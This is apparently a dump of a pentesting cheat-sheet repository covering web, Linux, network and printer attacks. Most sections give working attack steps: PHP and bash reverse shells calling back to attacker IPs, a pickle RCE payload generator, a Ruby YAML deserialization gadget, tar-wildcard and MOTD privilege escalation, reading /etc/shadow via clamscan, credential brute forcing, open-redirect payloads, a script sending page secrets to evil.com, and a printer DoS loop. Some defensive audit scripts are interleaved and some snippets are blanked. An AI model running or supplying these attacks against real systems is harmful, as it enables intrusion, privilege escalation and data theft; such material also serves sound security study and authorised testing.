### 1. Update apache2.conf

First modify the “apache2.conf” file to change the web user to a new one.

```bash
# These need to be set in /etc/apache2/envvars
User www-data
Group www-data
```

### 2. Insert Reverse Shell Script

In the web directory (e.g. `/var/www/html`), create a reverse shell script.
Assume the website uses PHP, so we can create “shell.php” in the web root and insert the [PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) script.

### 3. Restart Apache Server

### 4. Get a Shell

We need to start a listener in the local terminal.

```bash
nc -lvnp 1234
```

Then access the web page, e.g. `https://example.com/shell.php`.

We should get a shell as the desired user.

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/rtsp.md:
--------------------------------------------------------------------------------
# RTSP (Real Time Streaming Protocol) Pentesting

RTSP is an application-level network protocol designed for multiplexing and packetizing multimedia transport streams over a suitable transport protocol. Default ports are 554 and 8554.

## Enumeration

```sh
nmap --script rtsp-* -p 554,8554
```

## Default Credential

```bash
admin:admin
admin:12345
```

## Watch RTSP Stream using VLC Media Player

Reference: [https://www.youtube.com/watch?v=ksUylvdJQDQ](https://www.youtube.com/watch?v=ksUylvdJQDQ)

We might be able to watch an **RTSP stream** using a media player such as **VLC**. Here is the example for VLC.
First off, if we don’t have VLC Media Player, we need to install it with the following command.

```bash
sudo apt install vlc
```

Then open **VLC** and follow these steps:

1. Click on **Open Network Stream...** in the **Media** menu.
2. In the dialog, enter the network URL like **`rtsp://10.0.0.2:554`**. Replace **`10.0.0.2`** with the target IP address.
3. Enter the username and password in the login screen.

Now we might be able to watch the RTSP stream.
--------------------------------------------------------------------------------
/docs/exploit/web/broken-link-hijacking.md:
--------------------------------------------------------------------------------
# Broken Link Hijacking

Broken Link Hijacking is an attack in which an attacker can execute arbitrary code by hijacking a link, e.g. to a JavaScript file, when the target website loads a file from a broken link.

## Investigation

Assume that the target website loads an external JavaScript file from `example.com`, which no longer exists, as below.

```bash

```

If an attacker buys this domain, they can host an arbitrary JavaScript file named **`script.js`** in the `example.com` root directory.

## Exploitation Examples

Attackers can write arbitrary code to compromise users in **`script.js`** as in the example above.
For example, if the target website includes sensitive information about the authenticated user on the page where the broken link is loaded, attackers can send that information to a server they own.

```jsx
// script.js
var secret = document.getElementById('userinfo').textContent;
var request = new XMLHttpRequest();
request.open('GET', 'http://evil.com/?data=' + encodeURIComponent(secret), false);
request.send();
```

## References

- [EdOverflow](https://edoverflow.com/2017/broken-link-hijacking/)

--------------------------------------------------------------------------------
/docs/exploit/web/cms/typo3.md:
--------------------------------------------------------------------------------
# TYPO3 Pentesting

TYPO3 is a web content management system. It can run on web servers like Apache, Nginx or IIS.
## Directory Discovery

```txt
/fileadmin/
/typo3/
/typo3conf/
/typo3temp/
```

## Default Credentials

```txt
admin:
```

## Reverse Shell (Admin Credential Required)

First, to check and edit the configuration of the allowed upload file extensions, go to “ADMIN TOOLS” → “Configure Installation-Wide Options” → “Backend” → “fileDenyPattern”.
Update the configuration if necessary. For example, remove “php[1-9]?” so that the pattern becomes:

```txt
\.(phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$
```

Next, prepare the reverse shell payload named “shell.php”.

```sh
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
```

Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin.
Now you need to open a listener to catch the shell.

```sh
nc -lvnp 4444
```

Then access “/fileadmin/shell.php”. You should get the shell.

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/updated-motd.md:
--------------------------------------------------------------------------------
# Update-Motd Privilege Escalation

`/etc/update-motd.d/` is used to generate the dynamic message of the day (MOTD) that is displayed to users when they log in to the system. If we can modify the files in this directory, we can inject a malicious script to escalate privileges.

## Investigation

```bash
ls -al /etc/update-motd.d/
```

If we have permission to modify files in this directory, we can inject arbitrary code that is executed when logging in.

## Exploitation

Run the following command to copy the bash binary and set the **`suid`** bit on the copy.
Replace **``** with your current user name.
```bash
echo "cp /bin/bash /home//bash && chmod u+s /home//bash" >> /etc/update-motd.d/00-header
```

After that, log out and log in again with SSH. The script above should be executed.
Now execute the following command under **`/home/`**.

```bash
./bash -p
```

We should get a root shell.

## References

- [StackExchange](https://security.stackexchange.com/questions/234859/inject-update-motd-d-00-header-to-run-a-script-on-ssh-login)

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/sudo/clamav.md:
--------------------------------------------------------------------------------
# Sudo ClamAV Privilege Escalation

The `sudo clamscan` command might be vulnerable to privilege escalation (PrivEsc).

## Investigation

If we can execute the **“clamscan”** command as root as below,

```bash
sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/results
```

we can read sensitive files by applying a custom YARA rule.

## Exploitation

### 1. Create a Yara Rule

First off, find a location where the YARA file can be created.

```bash
find / -name "clam*" 2>/dev/null
```

For instance, assume we can create the YARA file under **/var/lib/clamav/**.
Create the YARA rule there.
Assume we want to read /etc/shadow, so specify the string **“root”** because /etc/shadow contains the “root” user name.

```yara
// /var/lib/clamav/test.yara
rule test
{
    strings:
        $string = "root"
    condition:
        $string
}
```

### 2. Execute ClamScan

Now execute **"clamscan"** as root.

```bash
sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/results
```

We can see **/etc/shadow** under **/tmp/results**.
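The `sudo -l` rule shapes that the tee, vim and clamscan sections above exploit, turned into an added audit script that is not part of this repo: it parses `sudo -l` output and flags rules for those binaries. `SAMPLE_SUDO_L` is constructed, and `RISKY_BINARIES` is an assumption limited to the three binaries covered by those sections.

```python
import re
from typing import Dict, List

# Binary -> why a sudo rule for it is equivalent to root (from the sections above)
RISKY_BINARIES: Dict[str, str] = {
    "tee": "writes any file as root, e.g. appending a UID 0 user to /etc/passwd",
    "vim": "runs shell commands and Python from inside the editor (:r!, :py3)",
    "clamscan": "--copy copies matching files such as /etc/shadow to a user-readable dir",
}

# One `sudo -l` rule line: "(runas) [TAG: ...] command[, command]"
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample output; host, user and rules are made up for the demo
SAMPLE_SUDO_L = """\
Matching Defaults entries for tester on host:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User tester may run the following commands on host:
    (root) NOPASSWD: /usr/bin/tee
    (ALL) NOPASSWD: vim example.txt
    (root) /usr/bin/clamscan, /usr/bin/id
"""


def parse_sudo_l(output: str) -> List[dict]:
    """Turn the rule lines of `sudo -l` output into one dict per command."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue  # header, Defaults line or blank line
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            # "/usr/bin/clamscan /etc/shadow" and "vim example.txt" both reduce to the binary name
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            rules.append({
                "runas": m.group("runas").split(":")[0].strip(),  # user part of "(user : group)"
                "nopasswd": "NOPASSWD" in m.group("tags"),
                "command": cmd,
                "binary": binary,
            })
    return rules


def audit_sudo_rules(output: str) -> List[str]:
    """One finding per rule that hands out a binary from RISKY_BINARIES."""
    findings = []
    for r in parse_sudo_l(output):
        reason = RISKY_BINARIES.get(r["binary"])
        if reason is None:
            continue
        who = "root" if r["runas"] in ("ALL", "root") else r["runas"]
        pw = "without a password" if r["nopasswd"] else "with a password"
        findings.append(f"{r['command']} as {who} {pw}: {reason}")
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L):
        print(finding)
```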
--------------------------------------------------------------------------------
/docs/exploit/network/tool/convert-putty-key-to-openssh-key.md:
--------------------------------------------------------------------------------
# Convert PuTTY Key to OpenSSH Key

## Install PuTTYgen

If you don’t have **`putty-tools`** on **Linux**, install it first.

```bash
# Install in Linux
sudo apt install putty-tools
```

If you use **`puttygen`** on **Windows**, install **PuTTYgen** from the official page.

## Generate Key Pair

```bash
# -t: key type
# -b: number of bits
# -C: key comment
# -o: output file
puttygen -t rsa -b 2084 -C "user@example.com" -o keyfile.ppk
```

### PuTTY to SSH Key

If you use **`puttygen`** on **Linux**, run the following commands to convert the PuTTY key to **OpenSSH** keys (private/public).

```bash
# SSH private key
puttygen keyfile.ppk -O private-openssh -o id_rsa

# SSH public key
puttygen keyfile.ppk -O public-openssh -o id_rsa.pub
```

If you use **`puttygen`** on **Windows**, follow these steps:

1. Open **PuTTYgen**.
2. Click on **Conversions → Import key** in the top menu. Then upload the PuTTY key file (**`.ppk`**).
3. After uploading, click on **Conversions → Export OpenSSH key**.
4. The **OpenSSH** private key will be downloaded.

--------------------------------------------------------------------------------
/docs/exploit/windows/wsl.md:
--------------------------------------------------------------------------------
# WSL Pentesting

WSL (Windows Subsystem for Linux) is a feature of Windows that allows developers to run a Linux environment without the need for a separate virtual machine or dual booting.

## Enumeration

### Interesting Information

Run the following commands in WSL.
```bash
# Configuration
cat /etc/wsl.conf

# IP address of host machine
ip route | grep default

# IP address of WSL itself
ip a
# or
hostname -I
```

## Escape WSL to Windows Host Machine

If we are currently on a WSL machine, we can access the host Windows machine's filesystem as below.

```bash
cd /mnt/c/
```

If **`/mnt/c/`** is empty, we need to mount the folder by running the following command.

```bash
cd /

# -t: Limit the set of filesystem types
# drvfs: A plugin for WSL
# C: : Specify the Windows root
mount -t drvfs C: /mnt/c
```

## Switch Default User to Root

The following command changes the default user to `root` when booting WSL. This could potentially be used to escalate privileges.
Run it in PowerShell, using the launcher of the installed distribution (`ubuntu`, `debian`, ...):

```powershell
ubuntu config --default-user root
```

--------------------------------------------------------------------------------
/docs/exploit/web/php-filters-chain.md:
--------------------------------------------------------------------------------

# PHP Filters Chain

## Exploitation

[PHP Filter Chain Generator](https://github.com/synacktiv/php_filter_chain_generator) is available, so we can use it.

```bash
python3 php_filter_chain_generator.py --chain ''
```

All we have to do is paste the generated payload into **`/?page=`**.

### Reverse Shell

First create a shell script named **"revshell"** on the local machine.

```bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
```

Then create a chain using the generator.
Replace the IP address with your own.
```bash
# `` is a shorthand for ``
python3 php_filter_chain_generator.py --chain ''
```

We need to start a web server that hosts the shell script, and also start a listener for receiving the reverse connection.

```bash
# terminal 1
sudo python3 -m http.server 80

# terminal 2
nc -lvnp 4444
```

Now access **`/?page=`** and we should get a shell.

## References

- [Synacktiv](https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)

--------------------------------------------------------------------------------
/docs/exploit/archives/zip-unzip.md:
--------------------------------------------------------------------------------

# Zip & Unzip

Zip is a command-line tool used for creating and manipulating compressed archive files in Unix, Linux, and other Unix-like operating systems.

## Compress

```sh
zip ...

zip example.zip example1.txt example2.txt
# -r: recursive (zip folder)
zip -r example.zip ./example
```

### Symbolic Links

We can store symbolic links in a zip file.

```sh
ln -s /etc/passwd test.txt
zip --symlink test.zip test.txt
```

## Decompress

```sh
unzip example.zip
# Specify the directory to decompress into
unzip example.zip -d ./example
```

### List Files without Decompressing

To list the files in a zip file without extracting, use the **`-l`** flag.

```bash
unzip -l example.zip
```

## Unzip with Python

We can also decompress an archive using a Python script.
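Before handing a user-supplied archive to any extractor, it is worth inspecting its entries: an archive can carry the symlink entries created above with `zip --symlink`, or names containing `../`. Python's `zipfile` itself strips `..` components and writes symlink entries as plain files, but other extractors restore symlinks, so the check below is useful wherever the archive goes next. The following added example is mine, not code from the original page; the sample archive is constructed in memory.

```python
import io
import posixpath
import stat
import zipfile


def is_symlink(info: zipfile.ZipInfo) -> bool:
    """True if the entry was stored as a symbolic link (zip --symlink).
    The Unix mode lives in the high 16 bits of external_attr."""
    mode = (info.external_attr >> 16) & 0xFFFF
    return stat.S_ISLNK(mode)


def escapes(name: str) -> bool:
    """True if the entry name would land outside the extraction directory
    (absolute path, drive letter, backslashes, or a leading '..')."""
    if name.startswith("/") or "\\" in name:
        return True
    if len(name) > 1 and name[1] == ":":
        return True
    normalized = posixpath.normpath(name)
    return normalized == ".." or normalized.startswith("../")


def find_unsafe_entries(zip_bytes: bytes) -> list:
    """Return (name, reason) for every entry that should block extraction."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if is_symlink(info):
                # for a symlink entry the stored content is the link target
                target = zf.read(info).decode("utf-8", "replace")
                findings.append((info.filename, f"symlink -> {target}"))
            if escapes(info.filename):
                findings.append((info.filename, "path escapes extraction dir"))
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: a normal file, a symlink entry pointing at
    /etc/passwd (what `ln -s /etc/passwd test.txt; zip --symlink` stores)
    and an entry whose name climbs out of the target directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "hello")
        link = zipfile.ZipInfo("test.txt")
        link.create_system = 3  # Unix
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/etc/passwd")
        zf.writestr("../../etc/cron.d/job", "")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in find_unsafe_entries(build_sample_archive()):
        print(f"{name}: {reason}")
```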
```py
import zipfile

filename = "./sample.zip"
extdir = "./"
password = "password123"

with zipfile.ZipFile(filename, 'r') as zp:
    try:
        # pwd must be bytes; a wrong password raises RuntimeError
        zp.extractall(path=extdir, pwd=password.encode('utf-8'))
    except RuntimeError as e:
        print(e)
```

--------------------------------------------------------------------------------
/docs/exploit/web/webanno.md:
--------------------------------------------------------------------------------

# WebAnno Pentesting

WebAnno is a web-based annotation tool for a wide range of linguistic annotations. The server uses port 8080.

## Default Credentials

```bash
admin:admin
```

## Reverse Shell

If the target system serves the website associated with the WebAnno service, we can get a reverse shell by uploading the payload and accessing the web page that hosts it.

### 1. Go to the Upload Screen in Dashboard

1. Login
2. Click "Projects".
3. Select the project in the left pane.
4. Click the Documents tab.

### 2. Prepare Payload

WebAnno allows us to upload arbitrary file formats, so we can upload a PHP file for a reverse shell.

```bash
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
vim shell.php

# Edit $ip and $port in the editor.
```

Then start a listener on the local machine.

```sh
nc -lvnp 4444
```

### 3. Upload the Payload

In the WebAnno dashboard, upload the PHP file on the Documents page.

### 4. Access the Payload File on Another Server

For instance, access http://sub.example.com/path/to/shell.php and we get a shell in the local terminal.
--------------------------------------------------------------------------------
/docs/exploit/hardware/sal-logic-analysis.md:
--------------------------------------------------------------------------------

# SAL Logic Analysis

A SAL file is a capture file of the Saleae Logic Analyzer.

## Analysis

**[Saleae's Logic Analyzer](https://www.saleae.com/)** is a tool for hardware analysis.
Download **Logic 2** and start it.

```sh
chmod +x ./Logic-x.x.x-master.AppImage
./Logic-x.x.x-master.AppImage
```

In the analyzer, click **"Open a capture"** and select the target file, e.g. a **".sal"** file.
Open the **"Analyzer"** tab on the right of the window and click on **"Async Serial"**.
A dialog opens; configure values such as the **`Bit Rate`**, then click the Save button.

After configuration, we can see the analyzed data in the Data section. Click the terminal icon to see what data was transmitted.
To add another Async Serial analyzer, click the "+" icon on the right of the Analyzers header.

## Read Code

1. Click **File → Export Data**, then select **CSV** in the Export Raw Data popup.
2. Click **Export**.

## Calculate Bit Rate from Intervals

```txt
Bit rate (bit/s) = 1 second / (interval(microseconds) x 10^(-6)) seconds
```

## References

- [Saleae Support](https://support.saleae.com/user-guide/using-logic/using-protocol-analyzers)

--------------------------------------------------------------------------------
/docs/exploit/web/framework/pickle-rce.md:
--------------------------------------------------------------------------------

# Python Pickle RCE

The Python "pickle" module, which serializes and deserializes Python objects, can lead to remote code execution when it deserializes untrusted data. If the website uses this module on user-supplied input, we may be able to execute arbitrary code.
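The reason this works is that unpickling imports and calls whatever module-level callable the stream names, which is also where the mitigation lives. The following added example is mine, not from the original page: it pickles a constructed harmless class whose `__reduce__` returns `os.getpid` instead of `os.system`, shows that the default loader executes it, and shows an `Unpickler` subclass that refuses any global outside an allow-list (a defense-in-depth measure; the real fix is not to unpickle untrusted data at all).

```python
import io
import os
import pickle


class Ping:
    """Constructed stand-in for the RCE class on this page: on load, pickle
    calls os.getpid() with no arguments instead of os.system(cmd)."""
    def __reduce__(self):
        return os.getpid, ()


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only an explicit allow-list of globals.

    find_class is consulted for every GLOBAL/STACK_GLOBAL opcode, i.e. for
    every callable a payload's __reduce__ names (os.system, subprocess.Popen,
    builtins.eval, ...). Anything not allow-listed is refused before the
    REDUCE opcode can call it. Note that pickle records builtin functions
    under the module that defines them, so os.system appears as posix.system.
    """
    ALLOWED = {
        ("builtins", "set"),
        ("builtins", "frozenset"),
        ("collections", "OrderedDict"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def restricted_roundtrip(obj):
    """Plain data (dict/list/str/int/bytes) needs no globals, so it loads."""
    return restricted_loads(pickle.dumps(obj))


def demo() -> tuple:
    """Return (result of the default loader, result of the restricted one)
    for the constructed Ping payload."""
    payload = pickle.dumps(Ping())
    unsafe = pickle.loads(payload)  # calls os.getpid() during loading
    try:
        restricted_loads(payload)
        restricted = "loaded"
    except pickle.UnpicklingError as e:
        restricted = str(e)
    return unsafe, restricted


if __name__ == "__main__":
    print(demo())
```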
## Exploitation

Below is the Python script (**`mypickle.py`**) to generate the payload for a reverse shell.

```python
import pickle
import base64
import os

class RCE:
    # pickle calls the returned callable with the given arguments on load
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4444 > /tmp/f')
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.b64encode(pickled).decode())
    # or, if the payload goes into a URL
    print(base64.urlsafe_b64encode(pickled).decode())
```

Now run this script to generate the Base64 payload.

```bash
python3 mypickle.py
```

Copy the output Base64 string and paste it where the website deserializes the payload.
Before reloading the web page, start a listener on the local machine.

```bash
nc -lvnp 4444
```

Then reload the page. We should get a shell in the local terminal.

## References

- [David Hamann](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/snmp.md:
--------------------------------------------------------------------------------

# SNMP (Simple Network Management Protocol) Pentesting

SNMP is an internet standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. It uses UDP. The default port is 161.

## Enumeration

```sh
nmap -sU --script snmp-info -p 161
nmap -sU --script snmp-interfaces -p 161
nmap -sU --script snmp-processes -p 161
nmap -sU --script snmp-sysdescr -p 161
nmap -sU --script snmp* -p 161

# For SNMP v1
# -c: Community name
snmpwalk -v1 -c public -m ALL :
# For SNMP v2
snmpwalk -v2c -c public -m ALL :
# For SNMP v3
# -l: Security level: 'noAuthNoPriv', 'authNoPriv', 'authPriv'.
snmpwalk -v3 -l noAuthNoPriv -c public -m ALL :

# -c: community
# -p: port
snmp-check -p 161 -c public
```

### Brute Force the Community Names

```sh
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp

onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt
```

## Configuration Files

```bash
cat /etc/snmp/snmpd.conf
```

--------------------------------------------------------------------------------
/docs/exploit/cryptography/key-derivation-functions/bcrypt.md:
--------------------------------------------------------------------------------

# Bcrypt

Bcrypt is a password-hashing function based on the Blowfish cipher.

## Using Bcrypt in Python

Reference: [https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#bcrypt](https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#bcrypt)

To create a bcrypt hash,

```python
from base64 import b64encode
from Crypto.Hash import SHA256
from Crypto.Protocol.KDF import bcrypt

password = b"secret"
# Pre-hash with SHA-256 and Base64-encode so that passwords longer than
# bcrypt's 72-byte input limit are still fully covered
b64pwd = b64encode(SHA256.new(password).digest())
bcrypt_hash = bcrypt(b64pwd, 12)  # cost factor 12
print(f"hash: {bcrypt_hash}")
```

To check a password against it,

```python
from base64 import b64encode
from Crypto.Hash import SHA256
from Crypto.Protocol.KDF import bcrypt_check

password = b"secret"
# Specify the hash generated
bcrypt_hash = b"$2a$12$F86jMkaNbEm8lPm6q6zbCuiIGOAsz4azBZkAeSalFYXjctIjiQG1C"

try:
    b64pwd = b64encode(SHA256.new(password).digest())
    bcrypt_check(b64pwd, bcrypt_hash)
    print("Password is correct")
except ValueError:
    print("Incorrect password")
```

## References

- [PyCryptodome](https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#bcrypt)

--------------------------------------------------------------------------------
/docs/exploit/web/microsoft-exchange-server.md:
--------------------------------------------------------------------------------

# Microsoft Exchange Server Pentesting

Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft.

## Enumeration

### OWA (Outlook Web Access)

```bash
msfconsole
# Client Access Server (CAS) IIS HTTP Internal IP Disclosure
msf> use auxiliary/scanner/http/owa_iis_internal_ip
# Brute Force credentials
msf> use auxiliary/scanner/http/owa_login
```

## Common Directories

```bash
# Autodiscover service
/autodiscover/
/autodiscover/autodiscover.xml
# Enhanced Client or Proxy
/ecp/
# Exchange Web Services
/ews/
# Offline Address Books
/oab/
# Outlook Web Access
/owa/
/owa/auth/login.aspx
```

## ProxyShell RCE

CVE-2021-31207, CVE-2021-34523, CVE-2021-34473
Reference: [https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/](https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/)

```bash
msfconsole
msf> use exploit/windows/http/exchange_proxyshell_rce
msf> (set options...)
msf> exploit
meterpreter> shell
```

## References

- [Microsoft Learn](https://learn.microsoft.com/en-us/exchange/architecture/architecture?view=exchserver-2019)

--------------------------------------------------------------------------------
/docs/exploit/machine-learning/read-hdf5.md:
--------------------------------------------------------------------------------

# Read HDF5 (H5) File

HDF5 is a file format of the HDF (Hierarchical Data Format) family, designed to store and organize large amounts of data.

## TensorFlow

```python
import tensorflow as tf

model = tf.keras.models.load_model("example.h5")
model.summary()
```

## h5py

**h5py** is the Python library to read and write HDF5 files.

### Installation

```bash
pip3 install h5py
```

### Read HDF5 (H5)

Then run the following script.

```python
import h5py

with h5py.File('example.hdf5', 'r') as f:
    # Get all top-level keys
    print("All keys: %s" % list(f.keys()))
    # Get an object (a group or a dataset)
    print("Object: %s" % f["key_name"])
    print("Object keys: %s" % list(f["key_name"].keys()))
    print("Sub object: %s" % f["key_name"]["sub_key_name"])
```

### Write HDF5 (H5)

```python
import h5py
import numpy as np

data_matrix = np.random.uniform(-1, 1, size=(10, 3))

with h5py.File('example.hdf5', 'w') as f:
    f.create_dataset("dataset_name", data=data_matrix)
```

## References

- [h5py](https://docs.h5py.org/en/latest/quick.html)
- [StackOverflow](https://stackoverflow.com/questions/28170623/how-to-read-hdf5-files-in-python)

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/ruby.md:
--------------------------------------------------------------------------------

# Ruby Privilege Escalation

Ruby is an interpreted, high-level, general-purpose programming language.

## Remote Code Execution with YAML

Check whether the current user can run a Ruby script with root privileges.

```txt
(root) NOPASSWD: /usr/bin/ruby sample.rb
```

If sample.rb contains `File.read('sample.yml')`, modify the YAML file as follows:

```yml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp// 0>&1'"
         method_id: :resolve
```

Then start a listener on the local machine.

```sh
nc -lvnp
```

Now run the sudo command.

```sh
sudo /usr/bin/ruby sample.rb
```

--------------------------------------------------------------------------------
/docs/exploit/printer/ipp.md:
--------------------------------------------------------------------------------

# IPP (Internet Printing Protocol) Pentesting

IPP is a protocol for communication between client devices and printers. The default port is 631.

## Access in Web Browser

The CUPS server may be accessible via a browser.
Try entering the following in the browser's URL bar.

```txt
http://:631
```

## Connect

**[The Printer Exploitation Toolkit](https://github.com/RUB-NDS/PRET)** is a tool for printer security testing. Assume that we use it.
Try all three options until the target printer is recognized.
```sh
# ps: PostScript
python2 pret.py :631 ps

# pjl: Printer Job Language
python2 pret.py :631 pjl

# pcl: Printer Control Language
python2 pret.py :631 pcl
```

## Commands in PRET Shell

After connecting to the target printer, we can test it using the following commands.

```sh
# Print usage
> ?
> ?
```

## Other Exploits

### Denial of Service (DoS)

```sh
while true; do nc printer 9100; done
```

## References

- [TryHackMe](https://tryhackme.com/room/printerhacking101)
- [Printer Security Testing Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)

--------------------------------------------------------------------------------
/docs/exploit/web/open-redirect.md:
--------------------------------------------------------------------------------

# Open Redirect

An open redirect occurs when an application accepts user-controlled input that specifies a link to an external site and uses that link in a redirect.

## Payloads

```txt
https://vulnerable.com/example.php?redirectUrl=https://attacker.com/
https://vulnerable.com/example.php?redirectUrl=https:\\attacker.com\
https://vulnerable.com/example.php?redirectUrl=https://attacker.com#.vulnerable.com/

https://vulnerable.com/example.php?redirectUrl=https://attacker.com%E3%80%82%23.vulnerable.com/

https://vulnerable.com/example.php?redirectUrl=/%0d/attacker.com/
```

## Unrestricted QR Code Scanning

Reference: [https://shahjerry33.medium.com/open-redirection-qr-code-magic-18ace1a0170f](https://shahjerry33.medium.com/open-redirection-qr-code-magic-18ace1a0170f)

If a website (or mobile application) can scan QR codes but does not restrict the URL, we can make it read a malicious QR code.

### 1. Generate QR Code

First, we need to create a malicious QR code. There are many online tools for generating one.

### 2. Read Malicious QR Code in the Application

After generating the QR code, read it in the target application.
If the application does not validate the URL, we are sent to the malicious URL.

--------------------------------------------------------------------------------
/docs/exploit/machine-learning/data-processing/cluster-analysis.md:
--------------------------------------------------------------------------------

# Cluster Analysis for Machine Learning

We can find the number of clusters using methods such as K-means.

## Find Optimal Number of Clusters

### K-means & Elbow Curve

Reference: [https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=39](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=39)

We may find the optimal number of clusters by using the **K-means** algorithm and observing the **Elbow** graph.

```python
import numpy as np
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt

clusters = np.load("example.npy")

# specify the range of the number of clusters
K = range(1, 10)

distortions = []
for i in K:
    kmeans = KMeans(n_clusters=i)
    kmeans.fit(clusters)
    # inertia: sum of squared distances of samples to their closest centroid
    distortions.append(kmeans.inertia_)

plt.plot(K, distortions)
plt.xlabel("Number of clusters")
plt.ylabel("Distortion")
plt.show()
```

In the output graph, the last point at which the distortion (inertia) drops sharply, the "elbow", is likely the optimal number of clusters.
## References

- [Kaggle](https://www.kaggle.com/competitions/ai-village-ctf)
- [GeeksForGeeks](https://www.geeksforgeeks.org/elbow-method-for-optimal-value-of-k-in-kmeans/)

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/vnc.md:
--------------------------------------------------------------------------------

# VNC (Virtual Network Computing) Pentesting

VNC is a graphical desktop sharing system that uses the Remote Frame Buffer protocol to remotely control another computer. Default ports are 5800, 5801, 5900, 5901.

## Enumeration

```sh
nmap --script vnc-info -p 5900
# RealVNC authentication bypass (CVE-2006-2369)
nmap --script realvnc-auth-bypass -p 5900

msf> use auxiliary/scanner/vnc/vnc_none_auth
```

### Brute Force Credentials

A VNC server does not use a username, only a password.

```sh
hydra -P passwords.txt vnc://
hydra -P passwords.txt vnc
```

## Connect

### Using Remmina

```sh
remmina
remmina -c vnc://
remmina -c vnc://username@vulnerable.com
remmina -c vnc:vulnerable.com?VncUsername=username
remmina -c vnc://username:password@vulnerable.com
remmina -c vnc://vulnerable.com?VncUsername=username\&VncPassword=password
```

### Using VNC Viewer

If we don't have `vncviewer`, install it first:

```bash
sudo apt install tigervnc-viewer
```

Then run the following command to connect:

```bash
vncviewer 10.0.0.1:5901
# with password file
vncviewer -passwd ./passwd.txt 10.0.0.1:5901
```

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/tar-wildcard.md:
--------------------------------------------------------------------------------

# Tar Wildcard Injection PrivEsc

The `tar` command with wildcard injection may lead to privilege escalation (PrivEsc).

## Investigation

For example, the command below can be executed as root.

```sh
sudo -l

(root) NOPASSWD: /opt/backup/backup.sh
```

### Check If the File Contains a Tar Command with Wildcards

We need to check the content of the file.

```sh
cat /opt/backup/backup.sh

# -cf: create an archive file
tar -cf backup.tar *
```

The above **tar** command creates an archive from every file in the current directory because it passes a **wildcard (*)**. The shell expands the wildcard before tar runs, so a file whose name starts with `-` is passed to tar as an option.

## Exploitation

Now create a payload for privilege escalation.

```sh
cd /opt/backup
echo -e '#!/bin/bash\n/bin/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```

We've created three files.

```sh
ls /opt/backup

shell.sh '--checkpoint-action=exec=sh shell.sh' '--checkpoint=1'
```

Now execute the **"tar"** command as root with the wildcard.

```sh
sudo tar -cf example.tar *
```

Wait until the **"tar"** command has been executed.
After a while, we should see the current user switch to root.

```sh
whoami
root
```

--------------------------------------------------------------------------------
/docs/exploit/machine-learning/computer-vision/image-analysis.md:
--------------------------------------------------------------------------------

